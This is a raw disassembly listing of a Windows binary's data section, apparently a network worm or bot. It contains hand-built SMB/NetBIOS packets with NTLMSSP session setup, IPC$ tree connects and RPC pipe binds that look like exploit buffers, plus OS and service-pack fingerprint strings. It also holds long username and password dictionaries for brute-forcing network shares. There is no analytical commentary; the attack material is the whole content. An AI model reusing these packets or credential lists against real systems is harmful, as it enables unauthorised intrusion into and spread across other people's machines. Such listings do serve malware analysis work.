; ---------------------------------------------------------------------------
loc_43BCEB: ; CODE XREF: .text:0043BCD1�j
add edx, [eax]
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 48h, 7Fh, 16D016D0h, 0
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_43BD38 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_404105+17F�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_43C09C dd 20h, 0 dd 20h, 5C005Ch, 0
off_43C0B0 dd offset loc_43005A+2 ; DATA XREF: sub_404105+1B9�o
dd offset dword_5C0024
a123456111111_0:
unicode 0, <123456111111111111111.doc>,0
align 10h
dword_43C0F0 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
off_43C124 dd offset word_580046 ; DATA XREF: sub_404105+A2�o
; sub_404105+F2�o
dd offset loc_42004E
dd offset word_580046
dd offset word_580046
dd offset loc_42004E
dd offset word_580046
dd offset word_580046
dd offset word_580046
dd offset word_580046
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrr_0 db ''
db ''
db '',0
dword_43C200 dd 10016C6h dword_43C204 dd 100139Dh dword_43C208 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; sub_4044F6+C01�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_43C254 dd 3000005h, 10h, 18h, 1, 3 dup(0) ; sub_4044F6+C40�o
dword_43C270 dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
; DATA XREF: sub_4044F6+B1B�o
; sub_4044F6+C75�o
dword_43C284 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_4044F6+B3F�o
; sub_4044F6+C9C�o
unk_43C298 db 81h ; ; DATA XREF: sub_4044F6+AA�o
; sub_4044F6+916�o
db 2 dup(0), 44h
aCkfdenecfdef_0 db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aEkedfeeiedcaca db ' EKEDFEEIEDCACACACACACACACACACAAA',0
dd 0
dword_43C2E4 dd 2F000000h, 424D53FFh, 72h, 4 dup(0) ; sub_4044F6+948�o
dd 25C0000h, 0
dd 2000C00h, 4C20544Eh, 2E30204Dh, 3231h
dword_43C318 dd 48000000h, 424D53FFh, 73h, 4 dup(0) ; sub_4044F6+973�o
dd 25C0000h, 0
dd 0FF0Dh, 2FFFF00h, 25C00h, 2 dup(0)
dd 1000000h, 0B000000h, 6E000000h, 79700074h, 626D73h
dd 0
db 81h ;
db 2 dup(0), 44h
aCkfdenecfdef_1 db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aEkedfeeiedca_0 db ' EKEDFEEIEDCACACACACACACACACACAAA',0
dd 2 dup(0)
dword_43C3B8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_4044F6+2C8�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_43C448 dd 0B9000000h, 424D53FFh, 73h, 28011800h, 3 dup(0)
; DATA XREF: sub_4044F6+2FC�o
dd 0C0750000h, 6DD70000h, 0FF0Ch, 2FFDF00h, 100h, 5B000000h
dd 0
db 0
db 5Ch, 0D0h, 0
db 80h ; €
db 7Eh, 0, 60h
db 59h ; Y
db 2 dup(6), 2Bh
db 6
db 1, 2 dup(5)
db 2
db 0A0h, 4Fh, 30h
db 4Dh ; M
db 0A0h, 0Eh, 30h
db 0Ch
db 6, 0Ah, 2Bh
db 6
db 1, 4, 1
db 82h ; ‚
db 37h, 2 dup(2)
db 0Ah
db 0A2h, 3Bh, 4
a9ntlmssp db '9NTLMSSP',0
db 1, 2 dup(0)
db 0
db 1, 2, 8
db 0
db 9, 0, 9
db 0
db 20h, 2 dup(0)
db 0
db 10h, 0, 10h
db 0
db 29h, 2 dup(0)
db 0
aWorkgrouplqpxf db 'WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195',0
aWindows20005_0 db 'Windows 2000 5.0',0
align 4
dword_43C508 dd 0D010000h, 424D53FFh, 73h, 28011800h, 3 dup(0)
; DATA XREF: sub_4044F6+381�o
dd 0C0750000h
dword_43C528 dd 6DD72000h, 0FF0Ch, 2FFDF00h, 100h, 0AF000000h, 0
; DATA XREF: sub_4044F6+36E�o
dd 0D05C00h, 0A100D280h, 8130AC81h, 0A681A2A9h, 4EA38104h
dd 534D4C54h, 3005053h, 18000000h, 40001800h, 18000000h
dd 58001800h, 12000000h, 70001200h, 0
dd 82000000h, 20000000h, 82002000h, 0
dd 0A2000000h, 1000000h, 0ED000802h, 778839B7h, 0BE16D7h
dd 3 dup(0)
db 0
db 2 dup(0), 42h
db 0AEh ; ®
db 0B7h, 1Fh, 0BBh
db 6Dh ; m
db 0C1h, 84h, 99h
db 1
aKXEcTijW db 'k',8,'±xºeC',0Ah
db 'ÓšâI†)W',0
dd offset byte_52004F
dd offset byte_47004B
dd offset word_4F0052
dd offset byte_500055
dd offset dword_51006C
db 50h, 0, 78h
db 0
db 66h, 0, 32h
db 0
dd offset byte_530049
dd offset byte_670051
dd offset byte_560045
dd offset byte_620031
dd offset byte_4B0047
align 2
aWindows2000219 db 'Windows 2000 2195',0
aWindows20005_1 db 'Windows 2000 5.0',0
align 10h
dword_43C620 dd 6B000000h, 424D53FFh, 73h, 20011800h, 3 dup(0)
; DATA XREF: sub_4044F6+3B2�o
dd 0C0750000h, 6DD70000h, 0FF0Dh, 2FFDF00h, 100h, 2 dup(0)
dd 40000000h, 2E000000h, 4F570000h, 52474B52h, 50554Fh
aWindows20002_0 db 'Windows 2000 2195',0
aWindows20005_2 db 'Windows 2000 5.0',0
align 10h
dword_43C690 dd 37000000h, 424D53FFh, 75h, 20011800h, 3 dup(0)
; DATA XREF: sub_4044F6+3FF�o
dd 0C0750000h
dword_43C6B0 dd 6DD72001h, 0FF04h, 1000000h, 0C00h, 24435049h, 3F3F3F00h
; DATA XREF: sub_4044F6+3EF�o
dd 3F3Fh, 0
dword_43C6D0 dd 5C000000h, 424D53FFh, 0A2h, 20011800h, 3 dup(0)
; DATA XREF: sub_4044F6+4D1�o
; sub_4044F6+6D3�o
dword_43C6EC dd 4780800h ; sub_4044F6+6B3�o
dword_43C6F0 dd 400800h, 0DE00FF18h, 800DEh, 16h, 0 ; sub_4044F6+6C3�o
dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 5C000903h, 574F5242h, 524553h, 2 dup(0)
dword_43C738 dd 5B000000h, 424D53FFh, 0A2h, 20011800h, 3 dup(0)
; DATA XREF: sub_4044F6+468�o
dword_43C754 dd 4780800h dword_43C758 dd 400800h, 0DE00FF18h, 700DEh, 16h, 0 dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 5C000803h, 53565253h, 4356h
dword_43C798 dd 3F020000h, 424D53FFh, 2Fh, 20011800h, 3 dup(0)
; DATA XREF: sub_4044F6+54D�o
; sub_4044F6+74F�o
dword_43C7B4 dd 4780800h ; sub_4044F6+71C�o
dword_43C7B8 dd 400800h, 0FF0Eh ; sub_4044F6+72C�o
db 0
byte_43C7C1 db 0, 40h, 0 ; DATA XREF: sub_4044F6+53A�o
; sub_4044F6+73C�o
dd 0FF000000h, 8FFFFFFh, 20000h, 3F020000h, 0
dd 5020000h, 10030B00h, 0
dd 2, 0D0000000h, 16D016h, 0B000000h, 0
dd 84000100h, 1FB33323h, 2C0E9508h, 0C32C304Ah, 1830708h
dd 4000300h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h
dd 1000000h, 0BE000100h, 54A71E0Eh, 91E02161h, 23E45A04h
dd 2D082E6h, 4000300h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h
dd 2604810h, 2000000h, 0E9000100h, 0E77F4FDFh, 0A54D6B2Bh
dd 833CAAD4h, 0A10315h, 4000200h, 0EB8A885Dh, 9F11C91Ch
dd 2B0008E8h, 2604810h, 3000000h, 0AD000100h, 19D89A50h
dd 1CF35CB9h, 0AD534199h, 175601Eh, 4000000h, 0EB8A885Dh
dd 9F11C91Ch, 2B0008E8h, 2604810h, 4000000h, 97000100h
dd 409F7E21h, 0D7BEC99Eh, 0F1B0A4EBh, 595FE37h, 4000300h
dd 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h, 5000000h
dd 0FD000100h, 858B52C8h, 8B3A74CCh, 30E02915h, 216ACCDh
dd 4000100h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h
dd 6000000h, 5B000100h, 0E19ACBDEh, 1F728325h, 92A2A310h
dd 7636E7h, 4000200h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h
dd 2604810h, 7000000h, 74000100h, 9C0CDF4h, 0BEF37F2Dh
dd 0C3573B8h, 1685206h, 4000000h, 0EB8A885Dh, 9F11C91Ch
dd 2B0008E8h, 2604810h, 8000000h, 0E5000100h, 0E1EA256Ch
dd 4AC21B8Ah, 29885617h, 106C3EEh, 4000200h, 0EB8A885Dh
dd 9F11C91Ch, 2B0008E8h, 2604810h, 9000000h, 26000100h
dd 4D7D7050h, 7BAF8288h, 0EA1D963Dh, 29A17EBh, 4000100h
dd 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h, 0A000000h
dd 0C8000100h, 704B324Fh, 1201D316h, 0BF475A78h, 388E16Eh
dd 4000000h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h
dd 2 dup(0)
dword_43C9E0 dd 3B000000h, 424D53FFh, 2Eh, 20011800h, 3 dup(0)
; DATA XREF: sub_4044F6+5BD�o
; sub_4044F6+66D�o ...
dword_43C9FC dd 4780800h ; sub_4044F6+78F�o
dword_43CA00 dd 400800h, 0FF0Ah ; sub_4044F6+79F�o
db 0
byte_43CA09 db 0, 40h, 0 ; DATA XREF: sub_4044F6+5AD�o
; sub_4044F6+7AF�o
dd 80000000h, 0FFBB80BBh, 0FFFFFFh, 2 dup(0)
dword_43CA20 dd 0A3000000h, 424D53FFh, 2Fh, 20011800h, 3 dup(0)
; DATA XREF: sub_4044F6+630�o
dword_43CA3C dd 4780800h dword_43CA40 dd 400800h, 0FF0Eh db 0
byte_43CA49 db 0, 40h, 16h ; DATA XREF: sub_4044F6+61D�o
dd 0FF000000h, 8FFFFFFh, 6400h, 3F006400h, 0
dd 5006400h, 10030000h, 64000000h, 0
dd 4C000000h, 0A000000h, 1B002200h, 745AB37h, 0
dd 7000000h, 69000000h, 48004600h, 6C006E00h, 4E00h, 0A000000h
dd 0
dd 0A000000h, 6B000000h, 44007600h, 76007300h, 70004300h
dd 71005400h, 1000000h, 0FAh, 2 dup(0)
dword_43CAC8 dd 6F000000h, 424D53FFh, 2Fh, 20011800h, 3 dup(0)
; DATA XREF: sub_4044F6+82F�o
dword_43CAE4 dd 304F0800h dword_43CAE8 dd 7C540801h, 0FF0Eh db 0
byte_43CAF1 db 1, 40h, 49h ; DATA XREF: sub_4044F6+81F�o
dd 0FF000001h, 8FFFFFFh, 3000h, 3F003000h, 0
dd 5003000h, 10030000h, 30000000h, 0
dd 18000000h, 0A000000h, 35001C00h, 3329DE9h, 0
dd 3000000h, 4B000000h, 4700h, 0
dword_43CB3C dd 65706970h, 6D70655Ch, 65707061h, 72hdword_43CB4C dd 73255C5Ch, 5Ch ; sub_40978A+18F�o ...
dword_43CB54 dd 646E6957h, 2073776Fh, 302E35haWindows2000Lan db 'Windows 2000 LAN Manager*',0 ; DATA XREF: sub_4044F6+A29�o
align 4
aWindowsServer2 db 'Windows Server 2003 *.*',0 ; DATA XREF: sub_4044F6+A0A�o
aSamba db 'Samba *',0 ; DATA XREF: sub_4044F6+237�o
aWindows5_1 db 'Windows 5.1',0 ; DATA XREF: sub_4044F6+21D�o
; sub_4044F6+349�o
aNtLanManager_ db 'NT LAN Manager *.*',0 ; DATA XREF: sub_4044F6+1E7�o
align 4
aServicePack2 db '*Service Pack 2*',0 ; DATA XREF: sub_4044F6+1C5�o
align 10h
aServicePack1 db '*Service Pack 1*',0 ; DATA XREF: sub_4044F6+1AA�o
align 8
off_43CBE8 dd offset byte_454A34 ; DATA XREF: sub_405990+188�r
; sub_405990+190�o
dd offset aAdministrator ; "Administrator"
dd offset aAdmin ; "Admin"
dd offset aAdministrador ; "Administrador"
dd offset aAdministrateur ; "Administrateur"
dd offset aAdministrada ; "Administrada"
dd offset aAdministratoro ; "Administratoro"
dd offset aAdministrado_0 ; "Administrador'"
dd offset aAdministratore ; "Administratore"
dd offset aAdministratori ; "Administratori"
dd offset aAdministration ; "Administration"
dd offset aAdministrators ; "Administrators"
dd offset dword_43DD3C
dd offset dword_43DD2C
dd offset aAdministracion ; "Administracion"
dd offset aBeheerder ; "Beheerder"
dd offset aRendszergazda ; "Rendszergazda"
dd offset aVerwalter ; "Verwalter"
dd offset aHallintovirkai ; "Hallintovirkailijat"
dd offset aAmministratore ; "Amministratore"
dd offset aContgenerale ; "Contgenerale"
dd offset aXxxxxx ; "xxxxxx"
dd offset aDefault_0 ; "Default"
dd offset aDefault_1 ; "default"
dd offset aServer ; "Server"
dd offset aUtilizador ; "Utilizador"
dd offset aServidor ; "Servidor"
dd offset aServeur ; "serveur"
dd offset aManager ; "manager"
dd offset aSystem_0 ; "SYSTEM"
dd offset aAdm ; "adm"
dd offset aAdmins ; "admins"
dd offset aAdmin_0 ; "ADMIN"
dd offset aAdmin1 ; "Admin1"
dd offset aOwner ; "owner"
dd offset aRoot ; "root"
dd offset aApacheServer ; "apache server"
dd offset aHttpd ; "httpd"
dd offset aStandard ; "Standard"
dd offset aMaster ; "master"
dd offset aThomas ; "thomas"
dd offset aArsenal ; "arsenal"
dd offset aMonkey ; "monkey"
dd offset aCharlie ; "charlie"
dd offset aLiverpool ; "liverpool"
dd offset aLuna ; "luna"
dd offset aRdp ; "rdp"
dd offset aAsp_net ; "ASP.NET"
dd offset a01 ; "01"
dd offset a02 ; "02"
dd offset a03 ; "03"
dd offset a04 ; "04"
dd offset a05 ; "05"
dd offset aBlah ; "blah"
dd offset aClient ; "Client"
dd offset aClient01 ; "Client01"
dd offset aClient02 ; "Client02"
dd offset aClient03 ; "Client03"
dd offset aClient04 ; "Client04"
dd offset aClient05 ; "Client05"
dd offset aBillGates ; "bill gates"
dd offset aDivx ; "DiVX"
dd offset aDivxServer ; "DiVX-SERVER"
dd offset aExploited ; "exploited"
dd offset dword_43DB48
dd offset off_43DB44
dd offset aGameServer ; "game server"
dd offset aGameserver ; "gameserver"
dd offset aSudo ; "sudo"
dd offset aBox ; "box"
dd offset aBox1 ; "box1"
dd offset aBox2 ; "box2"
dd offset aBox3 ; "box3"
dd offset aBox4 ; "box4"
dd offset aBox5 ; "box5"
dd offset aGuest ; "guest"
dd offset a31337 ; "31337"
dd offset a@_5 ; "!@"
dd offset a@_4 ; "!@#"
dd offset a@_3 ; "!@#$"
; ---------------------------------------------------------------------------
rcr dl, 1
inc ebx
add al, cl
fiadd dword ptr [ebx+0]
rcr dl, 43h
add [eax-4FFFBC26h], bh
fiadd dword ptr [ebx+0]
lodsb
fiadd dword ptr [ebx+0]
test al, 0DAh
inc ebx
add [edx+ebx*8-255FFFBDh], ah
inc ebx
add [edx+ebx*8-2567FFBDh], bl
inc ebx
add [eax-7BFFBC26h], dl
fiadd dword ptr [ebx+0]
sbb dl, 43h
add [eax-26h], bh
inc ebx
add [eax-26h], dh
inc ebx
add [edx+ebx*8+43h], ch
add [eax-26h], ch
loc_43CD6E: ; CODE XREF: .text:0043CD90�j
inc ebx
add [edx+ebx*8+43h], ah
add [edx+ebx*8+43h], bl
add [eax-26h], bl
inc ebx
add [eax-26h], dl
inc ebx
add [eax-26h], al
inc ebx
add [eax], bh
fiadd dword ptr [ebx+0]
xor dl, bl
inc ebx
add [eax], ch
fiadd dword ptr [ebx+0]
js short loc_43CD6E
inc ebx
add [edx+ebx*8], bl
inc ebx
add [eax], dl
fiadd dword ptr [ebx+0]
or dl, bl
inc ebx
; ---------------------------------------------------------------------------
db 0
dd offset aAccount ; "account"
dd offset aAccounting ; "accounting"
dd offset aProftpd ; "proftpd"
dd offset aFtpd ; "ftpd"
dd offset aWarftpd ; "warftpd"
dd offset aLighthttpd ; "lightHTTPD"
dd offset aSlimftp ; "slimftp"
dd offset aServU ; "serv-u"
dd offset aServUFtp ; "Serv-U FTP"
dd offset aProfessional ; "Professional"
dd offset aPc01 ; "pc01"
dd offset aPc02 ; "pc02"
dd offset aPc03 ; "pc03"
dd offset aPc04 ; "pc04"
dd offset aPc05 ; "pc05"
dd offset aBoss ; "BOSS"
dd offset off_43D970
dd offset aFormationplus ; "FormationPLUS"
dd offset dword_43D954
dd offset aWww ; "www"
dd offset aWebserver ; "webserver"
dd offset asc_43D940 ; "X"
dd offset aY ; "y"
dd offset aXxxxxx ; "xxxxxx"
dd 2 dup(0)
off_43CE08 dd offset byte_454A34 ; DATA XREF: sub_405936+3�r
; sub_405936+F�o
dd offset asc_43D938 ; " "
dd offset aAdministrator ; "Administrator"
dd offset aAdministrador ; "Administrador"
dd offset aAdministrateur ; "Administrateur"
dd offset aAdministrada ; "Administrada"
dd offset aAdministratoro ; "Administratoro"
dd offset aAdministrado_0 ; "Administrador'"
dd offset aAdministratore ; "Administratore"
dd offset aAdministratori ; "Administratori"
dd offset aAdministration ; "Administration"
dd offset aAdministrators ; "Administrators"
dd offset aAdmin_1 ; "admin"
dd offset aAdmin123 ; "admin123"
dd offset aAccess ; "Access"
dd offset aAdministrato_0 ; "administrator"
dd offset dword_43DD3C
dd offset dword_43DD2C
dd offset aAdministracion ; "Administracion"
dd offset aBeheerder ; "Beheerder"
dd offset aRendszergazda ; "Rendszergazda"
dd offset aVerwalter ; "Verwalter"
dd offset aHallintovirk_0 ; "hallintovirkailijat"
dd offset aAmministratore ; "Amministratore"
dd offset aManager ; "manager"
dd offset aContgenerale ; "Contgenerale"
dd offset aDefault_0 ; "Default"
dd offset aStandard ; "Standard"
dd offset aUtilizador ; "Utilizador"
dd offset aOwner ; "owner"
dd offset aSystem_0 ; "SYSTEM"
dd offset aThomas ; "thomas"
dd offset aArsenal ; "arsenal"
dd offset aMonkey ; "monkey"
dd offset aCharlie ; "charlie"
dd offset aAdm ; "adm"
dd offset aAdmins ; "admins"
dd offset aAdmin_0 ; "ADMIN"
dd offset aAdmin1 ; "Admin1"
dd offset aSudo ; "sudo"
dd offset aLiverpool ; "liverpool"
dd offset aBoss ; "BOSS"
dd offset aDivx ; "DiVX"
dd offset aDivxServer ; "DiVX-SERVER"
dd offset off_43DA58
dd offset aDell ; "Dell"
dd offset aCompaqblah ; "Compaqblah"
dd offset aMaster ; "master"
dd offset aMailserver ; "mailserver"
dd offset aAspnet ; "aspnet"
dd offset aAspnet69 ; "aspnet69"
dd offset a31337 ; "31337"
dd offset a01 ; "01"
dd offset a02 ; "02"
dd offset a03 ; "03"
dd offset a04 ; "04"
dd offset a05 ; "05"
dd offset aBox ; "box"
dd offset aBox1 ; "box1"
dd offset aBox2 ; "box2"
dd offset aBox3 ; "box3"
dd offset aBox4 ; "box4"
dd offset aBox5 ; "box5"
dd offset dword_43AB88
dd offset aXxx ; "xxx"
dd offset aXxxx ; "xxxx"
dd offset aXxx_0 ; "xXx"
dd offset a@_3 ; "!@#$"
dd offset a@_2 ; "!@#$%"
dd offset a@_1 ; "!@#$%^"
dd offset a@_0 ; "!@#$%^&"
dd offset a@ ; "!@#$%^&*"
dd offset asc_43D8AC ; "%"
dd offset asc_43D8A8 ; "%%"
dd offset asc_43D8A4 ; "%%%"
dd offset asc_43D89C ; "%%%%"
dd offset asc_43D894 ; "%%%%%"
dd offset dword_43A30C
dd offset a00 ; "00"
dd offset a000 ; "000"
dd offset a0000 ; "0000"
dd offset a00000 ; "00000"
dd offset a000000 ; "000000"
dd offset a00000000 ; "00000000"
dd offset a007 ; "007"
dd offset a0wn3d ; "0wn3d"
dd offset a0wned ; "0wned"
dd offset a1 ; "1"
dd offset a110 ; "110"
dd offset a111 ; "111"
dd offset a111 ; "111"
dd offset a111111 ; "111111"
dd offset a11111111 ; "11111111"
dd offset a11111111 ; "11111111"
dd offset a12 ; "12"
dd offset a121 ; "121"
dd offset a121212 ; "121212"
dd offset a123 ; "123"
dd offset a123123 ; "123123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a12346 ; "12346"
dd offset a123467 ; "123467"
dd offset a1234678 ; "1234678"
dd offset a12346789 ; "12346789"
dd offset a123467890 ; "123467890"
dd offset a1234qwer ; "1234qwer"
dd offset a123abc ; "123abc"
dd offset a123asd ; "123asd"
dd offset a123qwe ; "123qwe"
dd offset a54321 ; "54321"
dd offset a654321 ; "654321"
dd offset a88888888 ; "88888888"
dd offset a31337 ; "31337"
dd offset aPc01 ; "pc01"
dd offset aPc02 ; "pc02"
dd offset aPc03 ; "pc03"
dd offset aPc04 ; "pc04"
dd offset aPc05 ; "pc05"
dd offset aBoss ; "BOSS"
dd offset aAussie ; "aussie"
dd offset dword_43DAAC
dd offset off_43DAA8
dd offset aAaaa ; "AAAA"
dd offset aAsdf ; "asdf"
dd offset aAbcd ; "abcd"
dd offset off_43D750
dd offset aAbc123 ; "abc123"
dd offset aAbcd ; "abcd"
dd offset aAccount? ; "account?"
dd offset aAccounting ; "accounting"
dd offset aAnything ; "anything"
dd offset aApache ; "apache"
dd offset aBillGates ; "bill gates"
dd offset aBillgates ; "billgates"
dd offset aChange ; "change"
dd offset aChangethis ; "changethis"
dd offset aChangeme ; "changeme"
dd offset aChangeme_0 ; "changeme!"
dd offset aCustomer ; "customer"
dd offset aClient ; "Client"
dd offset aClient01 ; "Client01"
dd offset aClient02 ; "Client02"
dd offset aClient03 ; "Client03"
dd offset aClient04 ; "Client04"
dd offset aClient05 ; "Client05"
dd offset aClosed_0 ; "closed!"
dd offset aClosed ; "closed"
dd offset aDefaultpass ; "defaultpass"
dd offset aDaemon_0 ; "daemon"
dd offset aDatabase ; "database"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDave ; "dave"
dd offset aDead ; "dead"
dd offset aDesktop ; "desktop"
dd offset aDb1234 ; "db1234"
dd offset aDbpass ; "dbpass"
dd offset aDefault_1 ; "default"
dd offset aExploited ; "exploited"
dd offset off_43D680
dd offset aSmbpass ; "smbpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aE_0 ; "e"
dd offset dword_43D664
dd offset off_43D660
dd offset aEducation ; "education"
dd offset aFucked ; "fucked"
dd offset aFuckyou ; "fuckyou"
dd offset aGuess ; "guess"
dd offset aGuessme ; "guessme"
dd offset aGuest ; "guest"
dd offset aHacked ; "hacked"
dd offset aHax ; "hax"
dd offset aLetmein ; "letmein"
dd offset aL337 ; "l337"
dd offset aL33t ; "l33t"
dd offset aLinux ; "linux"
dd offset aUnix ; "Unix"
dd offset aLogin ; "login"
dd offset aLocal ; "LOCAL"
dd offset aLoginpass ; "loginpass"
dd offset aMyvnc ; "myvnc"
dd offset aMs_user ; "MS_USER"
dd offset aMicrosoft ; "microsoft"
dd offset aMachine ; "machine"
dd offset aMs ; "MS"
dd offset aMypass ; "mypass"
dd offset aMypass123 ; "mypass123"
dd offset aMypc ; "mypc"
dd offset aMypc123 ; "mypc123"
dd offset aM_3 ; "M$"
dd offset aMysql ; "mysql"
dd offset aMssql ; "mssql"
dd offset aMyvps ; "myvps"
dd offset aMypc ; "mypc"
dd offset aNull_1 ; "NULL"
dd offset aOwn ; "own"
dd offset aOwned ; "owned"
dd offset aOwner ; "owner"
dd offset aPass_1 ; "pass"
dd offset aPass123 ; "pass123"
dd offset aPass1234 ; "pass1234"
dd offset aPasswd ; "passwd"
dd offset aPassword ; "password"
dd offset aPassword_0 ; "PASSWORD"
dd offset aPassword_1 ; "Password"
dd offset aPassword1 ; "password1"
dd offset aPassword123 ; "password123"
dd offset aPw ; "pw"
dd offset aPw123 ; "pw123"
dd offset off_43D508
dd offset aQ ; "q"
dd offset aQaz ; "qaz"
dd offset off_43D504
dd offset aQwer ; "qwer"
dd offset aQwert ; "qwert"
dd offset aQwerty ; "qwerty"
dd offset aBlink182 ; "blink182"
dd offset aRdp ; "rdp"
dd offset aR00t ; "r00t"
dd offset aRemote ; "remote"
dd offset aRoot ; "root"
dd offset aRooted ; "rooted"
dd offset aTest ; "Test"
dd offset aTest123 ; "test123"
dd offset aTester ; "tester"
dd offset aTesting ; "testing"
dd offset aTrojan ; "trojan"
dd offset aUser1 ; "user1"
dd offset aUsermane ; "usermane"
dd offset aUsername ; "username"
dd offset aUserpass ; "userpass"
dd offset aSa ; "sa"
dd offset aSchool ; "school"
dd offset aSecurity ; "security"
dd offset aSupport ; "support"
dd offset aSysadmin ; "sysadmin"
dd offset aSecret ; "secret"
dd offset aSecrets ; "secrets"
dd offset aSlave ; "slave"
dd offset aStudents ; "students"
dd offset aServidor ; "Servidor"
dd offset aServeur_0 ; "Serveur"
dd offset aServer ; "Server"
dd offset aSql ; "sql"
dd offset aSqlpass ; "sqlpass"
dd offset off_43D40C
dd offset off_43D970
dd offset aVirus ; "virus"
dd offset dword_43D400
dd offset off_43D3FC
dd offset aWin2kpro ; "Win2KPro"
dd offset aWindose ; "windose"
dd offset aWindows ; "windows"
dd offset aWindows2k ; "windows2k"
dd offset aWindows95 ; "windows95"
dd offset aWindows98 ; "windows98"
dd offset aWindowsme ; "windowsME"
dd offset aWindowsxp ; "WindowsXP"
dd offset aWindoze ; "windoze"
dd offset aWindoze2k ; "windoze2k"
dd offset aWindoze95 ; "windoze95"
dd offset aWindoze98 ; "windoze98"
dd offset aWindozeme ; "windozeME"
dd offset aWindozexp ; "windozexp"
dd offset aWine ; "wine"
dd offset aWing ; "wing"
dd offset aWinnt ; "winnt"
dd offset aWinpass ; "winpass"
dd offset aWinston ; "winston"
dd offset aWinxp ; "winxp"
dd offset aWired ; "wired"
dd offset aWin ; "win"
dd offset aWinxp ; "winxp"
dd offset aWin2k ; "win2k"
dd offset aWindows ; "windows"
dd offset aWww ; "www"
dd offset dword_43AB88
dd offset aY ; "y"
dd offset aXp_0 ; "xp"
dd offset aXx ; "xx"
dd offset aXxx ; "xxx"
dd offset aXxxx ; "xxxx"
dd offset aXxxxx ; "xxxxx"
dd offset aXxxxxx ; "xxxxxx"
dd offset aXxxxxxx ; "xxxxxxx"
dd offset aXxxxxxxx ; "xxxxxxxx"
dd offset aXxxxxxxxx ; "xxxxxxxxx"
dd offset aXyz ; "xyz"
dd offset aXyzzy ; "xyzzy"
dd offset aYouwontguessme ; "youwontguessme"
dd offset aYxcv ; "yxcv"
dd offset dword_43D2C4
dd offset off_43D2C0
dd offset aZxcv ; "zxcv"
align 8
aZxcv db 'zxcv',0 ; DATA XREF: .text:0043D2B0�o
align 10h
